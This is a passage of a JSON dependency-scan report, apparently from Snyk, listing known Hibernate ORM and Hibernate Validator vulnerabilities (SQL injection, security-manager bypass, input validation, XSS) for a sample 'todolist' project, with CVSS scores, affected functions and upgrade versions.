"isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-30098", - "title": "JSM bypass via ReflectionHelper", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[4.1.0.Beta1, 4.3.2.Final)", - "[5.0.0.Final,5.1.2.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.3.2.Final", - "5.1.2.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", - "title": "GitHub Commit" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-912", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/CVE-2014-3558", - "title": "Redhat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:48.734535Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", - "epssDetails": { - "percentile": "0.70800", - "probability": "0.00319", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3558" - ], - "CWE": [ - "CWE-592" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2016-12-25T16:51:53Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2014-07-17T16:51:53Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2014-07-17T16:51:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:45.778673Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-568162", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Alvaro Muñoz" - ], - "semver": { - "vulnerable": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "6.0.19.Final", - "6.1.3.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", - "className": "ValidatorImpl", - "functionName": "validate" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/pull/1071", - "title": "GitHub PR" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-1758", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:37.379564Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", - "epssDetails": { - "percentile": "0.49937", - "probability": "0.00139", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10693" - ], - "CWE": [ - "CWE-20" - ], - "GHSA": [ - "GHSA-rmrm-75hp-phr2" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-05T12:05:58.541980Z", - "functions_new": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.engine.ValidatorImpl", - "functionName": "validate" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-05T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-05-05T16:32:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.490090Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-569100", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "6.0.18.Final", - "6.1.0.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", - "className": "SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", - "title": "GitHub Commit" - }, - { - "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", - "title": "Hibernator Security Release Blog" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:47.749976Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", - "epssDetails": { - "percentile": "0.61710", - "probability": "0.00232", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-10219" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-14T16:07:06.897969Z", - "functions_new": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-10-18T14:55:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-01-09T14:55:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.455389Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": 